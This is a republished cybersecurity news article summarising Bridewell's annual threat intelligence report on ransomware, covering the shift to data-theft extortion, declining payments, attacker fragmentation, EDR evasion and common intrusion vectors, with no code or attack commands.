Bridewell, a UK-based cybersecurity services company, has released its latest CTI Annual Report, a comprehensive deep dive into ransomware trends. It highlighted a significant shift in attack strategies, payment dynamics, and threat actor behaviors, revealing that data theft and extortion have overtaken traditional encryption-only ransomware as the most successful approach for attackers. While encryption-based attacks tend to result in larger individual ransom payments, often due to the urgency of restoring critical services, data theft and extortion cases are more likely to result in a payment, with attackers leveraging the fear of regulatory penalties and reputational damage to pressure victims into compliance.[1]
At the same time, ransomware payments have continued to decline year-over-year overall. Bridewell attributes this to stricter regulations, greater law enforcement coordination, and increasing sanctions on cybercriminal entities. Organizations considering payment must now conduct rigorous due diligence to avoid inadvertently transacting with sanctioned groups or Ransomware-as-a-Service (RaaS) operations.
Other key findings include:
Vulnerability exploitation on the rise - Bridewell has observed that groups such as Clop and Termite have become highly proficient in exploiting internet-facing systems and edge devices, including Fortinet, Ivanti, and others. Exploiting unpatched vulnerabilities remains a primary attack vector, enabling threat actors to compromise numerous victims at scale and achieve more substantial financial outcomes.
Fragmentation and lone wolves - The ransomware ecosystem is becoming increasingly fragmented. Bridewell threat intelligence links this to both infighting within groups and persistent law enforcement takedowns, which have led to the splintering of major groups such as Conti and AlphV/BlackCat. This has resulted in a broader and more diverse pool of active ransomware actors, making the threat landscape more volatile and challenging to defend against.
Compounding this issue is the rise of lone-wolf actors, or individual affiliates or cybercriminals operating independently. These actors often rely on leaked RaaS source code or publicly available tools to mount ransomware operations without the need for an established group. This trend is partly driven by a lack of trust in larger operations due to the risk of exit scams, where affiliates are denied their share of ransom proceeds.
Tactical shifts in tooling and techniques - Bridewell continues to observe ransomware actors targeting VMware ESXi environments, aiming to cripple core virtualized infrastructure quickly. Groups like VanHelsing and DragonForce are actively pursuing this tactic in ongoing campaigns.
Meanwhile, adversaries are developing or acquiring capabilities to evade Endpoint Detection and Response (EDR) systems, often through the abuse of vulnerable drivers or native software features. The use of Living-Off-the-Land Binaries (LOLBINs) and Remote Monitoring and Management (RMM) tools has become widespread, allowing attackers to avoid detection and maintain persistent access without deploying traditional malware.
Despite efforts to disrupt its use, Cobalt Strike remains the most widely used offensive security tool by ransomware operators, closely followed by others such as Metasploit, Sliver, Brute Ratel, and, more recently, Pyramid C2, a Python-based command and control (C2) framework.
Shift to data theft-only operations - Bridewell has also observed the continued evolution of data-theft-only ransomware operations, which bypass encryption altogether. This approach is particularly effective in today’s increasingly regulated privacy landscape, where organizations fear substantial fines and long-term damage to their brand. Attackers are now refining their extortion tactics to exploit this pressure more effectively.
Remote access and patch management remain a weak link - Bridewell’s insights, aligned with Q1 2025 data from Coveware, show that remote access solutions (VPNs, RMMs) and unpatched software vulnerabilities continue to be the leading intrusion vectors. Although phishing incidents appear to be decreasing, it is likely that phishing is now being used indirectly, by access brokers selling credentials to ransomware affiliates. “We’re seeing a clear shift in ransomware tactics. Encryption-only attacks are proving less effective, while data theft and extortion are leading to more successful payment outcomes. At the same time, organizations are increasingly hesitant to pay ransoms due to growing regulatory pressure and the risk of violating sanctions,” said Gavin Knapp, Cyber Threat Intelligence Principal Lead at Bridewell. “Our goal with this report is to provide actionable insights that help organizations strengthen their defenses and build greater resilience against cyberattacks. Staying ahead of persistent and evolving threat actors is no easy task, but understanding and mitigating the risks posed by adversarial infrastructure must remain a core component of any robust cybersecurity strategy.
This article is shared with permission at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
[1] https://www.itsecurityguru.org/2025/06/25/bridewell-report-indicates-rise-in-lone-wolf-ransomware-actors/
Comments